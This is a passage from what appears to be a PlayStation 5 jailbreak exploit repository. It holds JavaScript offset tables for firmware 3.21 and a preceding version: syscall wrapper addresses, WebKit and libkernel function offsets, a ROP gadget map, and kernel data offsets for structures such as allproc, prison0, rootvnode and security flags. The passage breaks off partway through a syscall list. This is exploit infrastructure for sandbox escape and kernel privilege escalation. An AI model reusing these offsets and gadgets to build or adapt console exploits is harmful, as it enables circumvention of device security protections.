164 | 0x121: 0x34080, // sys_preadv
165 | 0x122: 0x335D0, // sys_pwritev
166 | 0x136: 0x332D0, // sys_getsid
167 | 0x13B: 0x34790, // sys_aio_suspend
168 | 0x144: 0x32E50, // sys_mlockall
169 | 0x145: 0x34250, // sys_munlockall
170 | 0x147: 0x32F50, // sys_sched_setparam
171 | 0x148: 0x33BC0, // sys_sched_getparam
172 | 0x149: 0x32710, // sys_sched_setscheduler
173 | 0x14A: 0x33590, // sys_sched_getscheduler
174 | 0x14B: 0x333F0, // sys_sched_yield
175 | 0x14C: 0x32990, // sys_sched_get_priority_max
176 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
177 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
178 | 0x154: 0x324A0, // sys_sigprocmask
179 | 0x155: 0x324E0, // sys_sigsuspend
180 | 0x157: 0x343B0, // sys_sigpending
181 | 0x159: 0x344D0, // sys_sigtimedwait
182 | 0x15A: 0x34110, // sys_sigwaitinfo
183 | 0x16A: 0x346F0, // sys_kqueue
184 | 0x16B: 0x32950, // sys_kevent
185 | 0x17B: 0x328F0, // sys_mtypeprotect
186 | 0x188: 0x32A10, // sys_uuidgen
187 | 0x189: 0x34E60, // sys_sendfile
188 | 0x18D: 0x32EB0, // sys_fstatfs
189 | 0x190: 0x32A70, // sys_ksem_close
190 | 0x191: 0x33800, // sys_ksem_post
191 | 0x192: 0x340A0, // sys_ksem_wait
192 | 0x193: 0x34E40, // sys_ksem_trywait
193 | 0x194: 0x32BB0, // sys_ksem_init
194 | 0x195: 0x345D0, // sys_ksem_open
195 | 0x196: 0x342B0, // sys_ksem_unlink
196 | 0x197: 0x32A30, // sys_ksem_getvalue
197 | 0x198: 0x34270, // sys_ksem_destroy
198 | 0x1A0: 0x34750, // sys_sigaction
199 | 0x1A1: 0x343F0, // sys_sigreturn
200 | 0x1A5: 0x330D0, // sys_getcontext
201 | 0x1A6: 0x33E00, // sys_setcontext
202 | 0x1A7: 0x33F20, // sys_swapcontext
203 | 0x1AD: 0x33120, // sys_sigwait
204 | 0x1AE: 0x327F0, // sys_thr_create
205 | 0x1AF: 0x32B50, // sys_thr_exit
206 | 0x1B0: 0x334F0, // sys_thr_self
207 | 0x1B1: 0x32B70, // sys_thr_kill
208 | 0x1B9: 0x34190, // sys_ksem_timedwait
209 | 0x1BA: 0x324C0, // sys_thr_suspend
210 | 0x1BB: 0x32DF0, // sys_thr_wake
211 | 0x1BC: 0x33E60, // sys_kldunloadf
212 | 0x1C6: 0x34B50, // sys__umtx_op
213 | 0x1C7: 0x34890, // sys_thr_new
214 | 0x1C8: 0x347F0, // sys_sigqueue
215 | 0x1D0: 0x34150, // sys_thr_set_name
216 | 0x1D2: 0x33700, // sys_rtprio_thread
217 | 0x1DB: 0x32E90, // sys_pread
218 | 0x1DC: 0x33FA0, // sys_pwrite
219 | 0x1DD: 0x34870, // sys_mmap
220 | 0x1DE: 0x34370, // sys_lseek
221 | 0x1DF: 0x33410, // sys_truncate
222 | 0x1E0: 0x32E70, // sys_ftruncate
223 | 0x1E1: 0x32460, // sys_thr_kill2
224 | 0x1E2: 0x34DE0, // sys_shm_open
225 | 0x1E3: 0x34850, // sys_shm_unlink
226 | 0x1E6: 0x33090, // sys_cpuset_getid
227 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32830, // sys_openat
230 | 0x203: 0x33EE0, // sys___cap_rights_get
231 | 0x20A: 0x33920, // sys_pselect
232 | 0x214: 0x339E0, // sys_regmgr_call
233 | 0x215: 0x33760, // sys_jitshm_create
234 | 0x216: 0x33D40, // sys_jitshm_alias
235 | 0x217: 0x32C30, // sys_dl_get_list
236 | 0x218: 0x33A80, // sys_dl_get_info
237 | 0x21A: 0x339C0, // sys_evf_create
238 | 0x21B: 0x32E10, // sys_evf_delete
239 | 0x21C: 0x33D60, // sys_evf_open
240 | 0x21D: 0x33940, // sys_evf_close
241 | 0x21E: 0x33C00, // sys_evf_wait
242 | 0x21F: 0x343D0, // sys_evf_trywait
243 | 0x220: 0x33D80, // sys_evf_set
244 | 0x221: 0x342F0, // sys_evf_clear
245 | 0x222: 0x33100, // sys_evf_cancel
246 | 0x223: 0x33BE0, // sys_query_memory_protection
247 | 0x224: 0x334D0, // sys_batch_map
248 | 0x225: 0x336E0, // sys_osem_create
249 | 0x226: 0x326B0, // sys_osem_delete
250 | 0x227: 0x32630, // sys_osem_open
251 | 0x228: 0x34C30, // sys_osem_close
252 | 0x229: 0x33CC0, // sys_osem_wait
253 | 0x22A: 0x342D0, // sys_osem_trywait
254 | 0x22B: 0x33F60, // sys_osem_post
255 | 0x22C: 0x33840, // sys_osem_cancel
256 | 0x22D: 0x335F0, // sys_namedobj_create
257 | 0x22E: 0x332F0, // sys_namedobj_delete
258 | 0x22F: 0x34EC0, // sys_set_vm_container
259 | 0x230: 0x32DB0, // sys_debug_init
260 | 0x233: 0x33720, // sys_opmc_enable
261 | 0x234: 0x32790, // sys_opmc_disable
262 | 0x235: 0x337A0, // sys_opmc_set_ctl
263 | 0x236: 0x337C0, // sys_opmc_set_ctr
264 | 0x237: 0x34210, // sys_opmc_get_ctr
265 | 0x23C: 0x33030, // sys_virtual_query
266 | 0x249: 0x34650, // sys_is_in_sandbox
267 | 0x24A: 0x33210, // sys_dmem_container
268 | 0x24B: 0x33AC0, // sys_get_authinfo
269 | 0x24C: 0x32610, // sys_mname
270 | 0x24F: 0x32C10, // sys_dynlib_dlsym
271 | 0x250: 0x32F10, // sys_dynlib_get_list
272 | 0x251: 0x349B0, // sys_dynlib_get_info
273 | 0x252: 0x338C0, // sys_dynlib_load_prx
274 | 0x253: 0x328B0, // sys_dynlib_unload_prx
275 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
277 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32480, // sys_sandbox_path
279 | 0x259: 0x32FF0, // sys_mdbg_service
280 | 0x25A: 0x33680, // sys_randomized_path
281 | 0x25B: 0x344F0, // sys_rdup
282 | 0x25C: 0x32AF0, // sys_dl_get_metadata
283 | 0x25D: 0x33230, // sys_workaround8849
284 | 0x25E: 0x329F0, // sys_is_development_mode
285 | 0x25F: 0x33B60, // sys_get_self_auth_info
286 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
287 | 0x262: 0x34EA0, // sys_budget_get_ptype
288 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x34C10, // sys_get_proc_type_info
290 | 0x265: 0x32420, // sys_get_resident_count
291 | 0x267: 0x33780, // sys_get_resident_fmem_count
292 | 0x268: 0x34830, // sys_thr_get_name
293 | 0x269: 0x33E40, // sys_set_gpo
294 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32930, // sys_test_debug_rwmem
296 | 0x26C: 0x32A50, // sys_free_stack
297 | 0x26E: 0x32650, // sys_ipmimgr_call
298 | 0x26F: 0x33AA0, // sys_get_gpo
299 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
300 | 0x271: 0x34430, // sys_opmc_set_hw
301 | 0x272: 0x32F70, // sys_opmc_get_hw
302 | 0x273: 0x325F0, // sys_get_cpu_usage_all
303 | 0x274: 0x33C60, // sys_mmap_dmem
304 | 0x275: 0x33010, // sys_physhm_open
305 | 0x276: 0x33820, // sys_physhm_unlink
306 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
307 | 0x279: 0x332B0, // sys_thr_resume_ucontext
308 | 0x27A: 0x33270, // sys_thr_get_ucontext
309 | 0x27B: 0x33370, // sys_thr_set_ucontext
310 | 0x27C: 0x32FB0, // sys_set_timezone_info
311 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
312 | 0x27E: 0x330B0, // sys_utc_to_localtime
313 | 0x27F: 0x34EE0, // sys_localtime_to_utc
314 | 0x280: 0x34060, // sys_set_uevt
315 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
316 | 0x282: 0x33450, // sys_get_map_statistics
317 | 0x283: 0x341F0, // sys_set_chicken_switches
318 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
319 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
320 | 0x288: 0x32690, // sys_app_state_change
321 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32730, // sys_process_terminate
323 | 0x28D: 0x32EF0, // sys_blockpool_open
324 | 0x28E: 0x32C90, // sys_blockpool_map
325 | 0x28F: 0x346D0, // sys_blockpool_unmap
326 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x333D0, // sys_blockpool_batch
328 | 0x292: 0x32B30, // sys_fdatasync
329 | 0x293: 0x33050, // sys_dynlib_get_list2
330 | 0x294: 0x34DA0, // sys_dynlib_get_info2
331 | 0x295: 0x34550, // sys_aio_submit
332 | 0x296: 0x32AD0, // sys_aio_multi_delete
333 | 0x297: 0x33900, // sys_aio_multi_wait
334 | 0x298: 0x329B0, // sys_aio_multi_poll
335 | 0x299: 0x34450, // sys_aio_get_data
336 | 0x29A: 0x338E0, // sys_aio_multi_cancel
337 | 0x29B: 0x32890, // sys_get_bio_usage_all
338 | 0x29C: 0x33F80, // sys_aio_create
339 | 0x29D: 0x349F0, // sys_aio_submit_cmd
340 | 0x29E: 0x348F0, // sys_aio_init
341 | 0x29F: 0x34350, // sys_get_page_table_stats
342 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x34950, // sys_blockpool_move
344 | 0x2A2: 0x347D0, // sys_virtual_query_all
345 | 0x2A3: 0x33880, // sys_reserve_2mb_page
346 | 0x2A4: 0x34130, // sys_cpumode_yield
347 | 0x2A5: 0x33C40, // sys_wait6
348 | 0x2A6: 0x336A0, // sys_cap_rights_limit
349 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
350 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
351 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32910, // sys_cap_fcntls_get
353 | 0x2AB: 0x34C70, // sys_bindat
354 | 0x2AC: 0x33470, // sys_connectat
355 | 0x2AD: 0x326D0, // sys_chflagsat
356 | 0x2AE: 0x32520, // sys_accept4
357 | 0x2AF: 0x32B10, // sys_pipe2
358 | 0x2B0: 0x33510, // sys_aio_mlock
359 | 0x2B1: 0x34BF0, // sys_procctl
360 | 0x2B2: 0x33EA0, // sys_ppoll
361 | 0x2B3: 0x33DE0, // sys_futimens
362 | 0x2B4: 0x34590, // sys_utimensat
363 | 0x2B5: 0x33B00, // sys_numa_getaffinity
364 | 0x2B6: 0x33960, // sys_numa_setaffinity
365 | 0x2C1: 0x32970, // sys_get_phys_page_size
366 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x331B0, // sys_openintr
368 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
369 | 0x2CE: 0x33290, // sys_acinfo_add
370 | 0x2CF: 0x32500, // sys_acinfo_delete
371 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32750, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x6FEC;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x316FEC;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE6FEC;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/3.21.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D658,
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EF7B,
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A269F3,
42 | "add rax, rdx" : 0x016D5582,
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | //check
48 | let syscall_map = {
49 | 0x001: 0x33B80, // sys_exit
50 | 0x002: 0x34B30, // sys_fork
51 | 0x003: 0x32D50, // sys_read
52 | 0x004: 0x32CB0, // sys_write
53 | 0x005: 0x33350, // sys_open
54 | 0x006: 0x33980, // sys_close
55 | 0x007: 0x32570, // sys_wait4
56 | 0x00A: 0x34670, // sys_unlink
57 | 0x00C: 0x34000, // sys_chdir
58 | 0x00F: 0x33A00, // sys_chmod
59 | 0x014: 0x32ED0, // sys_getpid
60 | 0x017: 0x329D0, // sys_setuid
61 | 0x018: 0x33FE0, // sys_getuid
62 | 0x019: 0x33390, // sys_geteuid
63 | 0x01B: 0x33430, // sys_recvmsg
64 | 0x01C: 0x33660, // sys_sendmsg
65 | 0x01D: 0x341B0, // sys_recvfrom
66 | 0x01E: 0x328D0, // sys_accept
67 | 0x01F: 0x326F0, // sys_getpeername
68 | 0x020: 0x34810, // sys_getsockname
69 | 0x021: 0x34330, // sys_access
70 | 0x022: 0x344B0, // sys_chflags
71 | 0x023: 0x33E80, // sys_fchflags
72 | 0x024: 0x34D60, // sys_sync
73 | 0x025: 0x33330, // sys_kill
74 | 0x027: 0x32DD0, // sys_getppid
75 | 0x029: 0x34390, // sys_dup
76 | 0x02A: 0x32D20, // sys_pipe
77 | 0x02B: 0x349D0, // sys_getegid
78 | 0x02C: 0x34D20, // sys_profil
79 | 0x02F: 0x32870, // sys_getgid
80 | 0x031: 0x32850, // sys_getlogin
81 | 0x032: 0x340E0, // sys_setlogin
82 | 0x035: 0x32A90, // sys_sigaltstack
83 | 0x036: 0x32BF0, // sys_ioctl
84 | 0x037: 0x33EC0, // sys_reboot
85 | 0x038: 0x33DC0, // sys_revoke
86 | 0x03B: 0x340C0, // sys_execve
87 | 0x041: 0x33A60, // sys_msync
88 | 0x049: 0x33250, // sys_munmap
89 | 0x04A: 0x33FC0, // sys_mprotect
90 | 0x04B: 0x33140, // sys_madvise
91 | 0x04E: 0x33310, // sys_mincore
92 | 0x04F: 0x327D0, // sys_getgroups
93 | 0x050: 0x32D70, // sys_setgroups
94 | 0x053: 0x327B0, // sys_setitimer
95 | 0x056: 0x325D0, // sys_getitimer
96 | 0x059: 0x33E20, // sys_getdtablesize
97 | 0x05A: 0x34230, // sys_dup2
98 | 0x05C: 0x33860, // sys_fcntl
99 | 0x05D: 0x333B0, // sys_select
100 | 0x05F: 0x32810, // sys_fsync
101 | 0x060: 0x33740, // sys_setpriority
102 | 0x061: 0x32F90, // sys_socket
103 | 0x062: 0x34020, // sys_connect
104 | 0x063: 0x34990, // sys_netcontrol
105 | 0x064: 0x32590, // sys_getpriority
106 | 0x065: 0x345B0, // sys_netabort
107 | 0x066: 0x34930, // sys_netgetsockinfo
108 | 0x068: 0x34630, // sys_bind
109 | 0x069: 0x338A0, // sys_setsockopt
110 | 0x06A: 0x32B90, // sys_listen
111 | 0x071: 0x33BA0, // sys_socketex
112 | 0x072: 0x33570, // sys_socketclose
113 | 0x074: 0x34D40, // sys_gettimeofday
114 | 0x075: 0x34E20, // sys_getrusage
115 | 0x076: 0x32550, // sys_getsockopt
116 | 0x078: 0x337E0, // sys_readv
117 | 0x079: 0x33640, // sys_writev
118 | 0x07A: 0x34290, // sys_settimeofday
119 | 0x07C: 0x331D0, // sys_fchmod
120 | 0x07D: 0x33A40, // sys_netgetiflist
121 | 0x07E: 0x34910, // sys_setreuid
122 | 0x07F: 0x33530, // sys_setregid
123 | 0x080: 0x34490, // sys_rename
124 | 0x083: 0x334B0, // sys_flock
125 | 0x085: 0x34D80, // sys_sendto
126 | 0x086: 0x34BB0, // sys_shutdown
127 | 0x087: 0x33F40, // sys_socketpair
128 | 0x088: 0x33CE0, // sys_mkdir
129 | 0x089: 0x32F30, // sys_rmdir
130 | 0x08A: 0x32440, // sys_utimes
131 | 0x08C: 0x348D0, // sys_adjtime
132 | 0x08D: 0x33A20, // sys_kqueueex
133 | 0x093: 0x33C80, // sys_setsid
134 | 0x0A5: 0x32770, // sys_sysarch
135 | 0x0B6: 0x34710, // sys_setegid
136 | 0x0B7: 0x325B0, // sys_seteuid
137 | 0x0BC: 0x34770, // sys_stat
138 | 0x0BD: 0x34B70, // sys_fstat
139 | 0x0BE: 0x33550, // sys_lstat
140 | 0x0BF: 0x32C50, // sys_pathconf
141 | 0x0C0: 0x33F00, // sys_fpathconf
142 | 0x0C2: 0x33490, // sys_getrlimit
143 | 0x0C3: 0x33070, // sys_setrlimit
144 | 0x0C4: 0x34690, // sys_getdirentries
145 | 0x0CA: 0x34470, // sys___sysctl
146 | 0x0CB: 0x33B20, // sys_mlock
147 | 0x0CC: 0x34510, // sys_munlock
148 | 0x0CE: 0x32FD0, // sys_futimes
149 | 0x0D1: 0x335B0, // sys_poll
150 | 0x0E8: 0x32670, // sys_clock_gettime
151 | 0x0E9: 0x33AE0, // sys_clock_settime
152 | 0x0EA: 0x34AE0, // sys_clock_getres
153 | 0x0EB: 0x346B0, // sys_ktimer_create
154 | 0x0EC: 0x32E30, // sys_ktimer_delete
155 | 0x0ED: 0x34B90, // sys_ktimer_settime
156 | 0x0EE: 0x34040, // sys_ktimer_gettime
157 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
158 | 0x0F0: 0x34570, // sys_nanosleep
159 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
160 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
161 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
162 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
163 | 0x0FD: 0x341D0, // sys_issetugid
164 | 0x110: 0x34970, // sys_getdents
165 | 0x121: 0x34080, // sys_preadv
166 | 0x122: 0x335D0, // sys_pwritev
167 | 0x136: 0x332D0, // sys_getsid
168 | 0x13B: 0x34790, // sys_aio_suspend
169 | 0x144: 0x32E50, // sys_mlockall
170 | 0x145: 0x34250, // sys_munlockall
171 | 0x147: 0x32F50, // sys_sched_setparam
172 | 0x148: 0x33BC0, // sys_sched_getparam
173 | 0x149: 0x32710, // sys_sched_setscheduler
174 | 0x14A: 0x33590, // sys_sched_getscheduler
175 | 0x14B: 0x333F0, // sys_sched_yield
176 | 0x14C: 0x32990, // sys_sched_get_priority_max
177 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
178 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
179 | 0x154: 0x324A0, // sys_sigprocmask
180 | 0x155: 0x324E0, // sys_sigsuspend
181 | 0x157: 0x343B0, // sys_sigpending
182 | 0x159: 0x344D0, // sys_sigtimedwait
183 | 0x15A: 0x34110, // sys_sigwaitinfo
184 | 0x16A: 0x346F0, // sys_kqueue
185 | 0x16B: 0x32950, // sys_kevent
186 | 0x17B: 0x328F0, // sys_mtypeprotect
187 | 0x188: 0x32A10, // sys_uuidgen
188 | 0x189: 0x34E60, // sys_sendfile
189 | 0x18D: 0x32EB0, // sys_fstatfs
190 | 0x190: 0x32A70, // sys_ksem_close
191 | 0x191: 0x33800, // sys_ksem_post
192 | 0x192: 0x340A0, // sys_ksem_wait
193 | 0x193: 0x34E40, // sys_ksem_trywait
194 | 0x194: 0x32BB0, // sys_ksem_init
195 | 0x195: 0x345D0, // sys_ksem_open
196 | 0x196: 0x342B0, // sys_ksem_unlink
197 | 0x197: 0x32A30, // sys_ksem_getvalue
198 | 0x198: 0x34270, // sys_ksem_destroy
199 | 0x1A0: 0x34750, // sys_sigaction
200 | 0x1A1: 0x343F0, // sys_sigreturn
201 | 0x1A5: 0x330D0, // sys_getcontext
202 | 0x1A6: 0x33E00, // sys_setcontext
203 | 0x1A7: 0x33F20, // sys_swapcontext
204 | 0x1AD: 0x33120, // sys_sigwait
205 | 0x1AE: 0x327F0, // sys_thr_create
206 | 0x1AF: 0x32B50, // sys_thr_exit
207 | 0x1B0: 0x334F0, // sys_thr_self
208 | 0x1B1: 0x32B70, // sys_thr_kill
209 | 0x1B9: 0x34190, // sys_ksem_timedwait
210 | 0x1BA: 0x324C0, // sys_thr_suspend
211 | 0x1BB: 0x32DF0, // sys_thr_wake
212 | 0x1BC: 0x33E60, // sys_kldunloadf
213 | 0x1C6: 0x34B50, // sys__umtx_op
214 | 0x1C7: 0x34890, // sys_thr_new
215 | 0x1C8: 0x347F0, // sys_sigqueue
216 | 0x1D0: 0x34150, // sys_thr_set_name
217 | 0x1D2: 0x33700, // sys_rtprio_thread
218 | 0x1DB: 0x32E90, // sys_pread
219 | 0x1DC: 0x33FA0, // sys_pwrite
220 | 0x1DD: 0x34870, // sys_mmap
221 | 0x1DE: 0x34370, // sys_lseek
222 | 0x1DF: 0x33410, // sys_truncate
223 | 0x1E0: 0x32E70, // sys_ftruncate
224 | 0x1E1: 0x32460, // sys_thr_kill2
225 | 0x1E2: 0x34DE0, // sys_shm_open
226 | 0x1E3: 0x34850, // sys_shm_unlink
227 | 0x1E6: 0x33090, // sys_cpuset_getid
228 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
229 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
230 | 0x1F3: 0x32830, // sys_openat
231 | 0x203: 0x33EE0, // sys___cap_rights_get
232 | 0x20A: 0x33920, // sys_pselect
233 | 0x214: 0x339E0, // sys_regmgr_call
234 | 0x215: 0x33760, // sys_jitshm_create
235 | 0x216: 0x33D40, // sys_jitshm_alias
236 | 0x217: 0x32C30, // sys_dl_get_list
237 | 0x218: 0x33A80, // sys_dl_get_info
238 | 0x21A: 0x339C0, // sys_evf_create
239 | 0x21B: 0x32E10, // sys_evf_delete
240 | 0x21C: 0x33D60, // sys_evf_open
241 | 0x21D: 0x33940, // sys_evf_close
242 | 0x21E: 0x33C00, // sys_evf_wait
243 | 0x21F: 0x343D0, // sys_evf_trywait
244 | 0x220: 0x33D80, // sys_evf_set
245 | 0x221: 0x342F0, // sys_evf_clear
246 | 0x222: 0x33100, // sys_evf_cancel
247 | 0x223: 0x33BE0, // sys_query_memory_protection
248 | 0x224: 0x334D0, // sys_batch_map
249 | 0x225: 0x336E0, // sys_osem_create
250 | 0x226: 0x326B0, // sys_osem_delete
251 | 0x227: 0x32630, // sys_osem_open
252 | 0x228: 0x34C30, // sys_osem_close
253 | 0x229: 0x33CC0, // sys_osem_wait
254 | 0x22A: 0x342D0, // sys_osem_trywait
255 | 0x22B: 0x33F60, // sys_osem_post
256 | 0x22C: 0x33840, // sys_osem_cancel
257 | 0x22D: 0x335F0, // sys_namedobj_create
258 | 0x22E: 0x332F0, // sys_namedobj_delete
259 | 0x22F: 0x34EC0, // sys_set_vm_container
260 | 0x230: 0x32DB0, // sys_debug_init
261 | 0x233: 0x33720, // sys_opmc_enable
262 | 0x234: 0x32790, // sys_opmc_disable
263 | 0x235: 0x337A0, // sys_opmc_set_ctl
264 | 0x236: 0x337C0, // sys_opmc_set_ctr
265 | 0x237: 0x34210, // sys_opmc_get_ctr
266 | 0x23C: 0x33030, // sys_virtual_query
267 | 0x249: 0x34650, // sys_is_in_sandbox
268 | 0x24A: 0x33210, // sys_dmem_container
269 | 0x24B: 0x33AC0, // sys_get_authinfo
270 | 0x24C: 0x32610, // sys_mname
271 | 0x24F: 0x32C10, // sys_dynlib_dlsym
272 | 0x250: 0x32F10, // sys_dynlib_get_list
273 | 0x251: 0x349B0, // sys_dynlib_get_info
274 | 0x252: 0x338C0, // sys_dynlib_load_prx
275 | 0x253: 0x328B0, // sys_dynlib_unload_prx
276 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
277 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
278 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
279 | 0x258: 0x32480, // sys_sandbox_path
280 | 0x259: 0x32FF0, // sys_mdbg_service
281 | 0x25A: 0x33680, // sys_randomized_path
282 | 0x25B: 0x344F0, // sys_rdup
283 | 0x25C: 0x32AF0, // sys_dl_get_metadata
284 | 0x25D: 0x33230, // sys_workaround8849
285 | 0x25E: 0x329F0, // sys_is_development_mode
286 | 0x25F: 0x33B60, // sys_get_self_auth_info
287 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
288 | 0x262: 0x34EA0, // sys_budget_get_ptype
289 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
290 | 0x264: 0x34C10, // sys_get_proc_type_info
291 | 0x265: 0x32420, // sys_get_resident_count
292 | 0x267: 0x33780, // sys_get_resident_fmem_count
293 | 0x268: 0x34830, // sys_thr_get_name
294 | 0x269: 0x33E40, // sys_set_gpo
295 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
296 | 0x26B: 0x32930, // sys_test_debug_rwmem
297 | 0x26C: 0x32A50, // sys_free_stack
298 | 0x26E: 0x32650, // sys_ipmimgr_call
299 | 0x26F: 0x33AA0, // sys_get_gpo
300 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
301 | 0x271: 0x34430, // sys_opmc_set_hw
302 | 0x272: 0x32F70, // sys_opmc_get_hw
303 | 0x273: 0x325F0, // sys_get_cpu_usage_all
304 | 0x274: 0x33C60, // sys_mmap_dmem
305 | 0x275: 0x33010, // sys_physhm_open
306 | 0x276: 0x33820, // sys_physhm_unlink
307 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
308 | 0x279: 0x332B0, // sys_thr_resume_ucontext
309 | 0x27A: 0x33270, // sys_thr_get_ucontext
310 | 0x27B: 0x33370, // sys_thr_set_ucontext
311 | 0x27C: 0x32FB0, // sys_set_timezone_info
312 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
313 | 0x27E: 0x330B0, // sys_utc_to_localtime
314 | 0x27F: 0x34EE0, // sys_localtime_to_utc
315 | 0x280: 0x34060, // sys_set_uevt
316 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
317 | 0x282: 0x33450, // sys_get_map_statistics
318 | 0x283: 0x341F0, // sys_set_chicken_switches
319 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
320 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
321 | 0x288: 0x32690, // sys_app_state_change
322 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
323 | 0x28C: 0x32730, // sys_process_terminate
324 | 0x28D: 0x32EF0, // sys_blockpool_open
325 | 0x28E: 0x32C90, // sys_blockpool_map
326 | 0x28F: 0x346D0, // sys_blockpool_unmap
327 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
328 | 0x291: 0x333D0, // sys_blockpool_batch
329 | 0x292: 0x32B30, // sys_fdatasync
330 | 0x293: 0x33050, // sys_dynlib_get_list2
331 | 0x294: 0x34DA0, // sys_dynlib_get_info2
332 | 0x295: 0x34550, // sys_aio_submit
333 | 0x296: 0x32AD0, // sys_aio_multi_delete
334 | 0x297: 0x33900, // sys_aio_multi_wait
335 | 0x298: 0x329B0, // sys_aio_multi_poll
336 | 0x299: 0x34450, // sys_aio_get_data
337 | 0x29A: 0x338E0, // sys_aio_multi_cancel
338 | 0x29B: 0x32890, // sys_get_bio_usage_all
339 | 0x29C: 0x33F80, // sys_aio_create
340 | 0x29D: 0x349F0, // sys_aio_submit_cmd
341 | 0x29E: 0x348F0, // sys_aio_init
342 | 0x29F: 0x34350, // sys_get_page_table_stats
343 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
344 | 0x2A1: 0x34950, // sys_blockpool_move
345 | 0x2A2: 0x347D0, // sys_virtual_query_all
346 | 0x2A3: 0x33880, // sys_reserve_2mb_page
347 | 0x2A4: 0x34130, // sys_cpumode_yield
348 | 0x2A5: 0x33C40, // sys_wait6
349 | 0x2A6: 0x336A0, // sys_cap_rights_limit
350 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
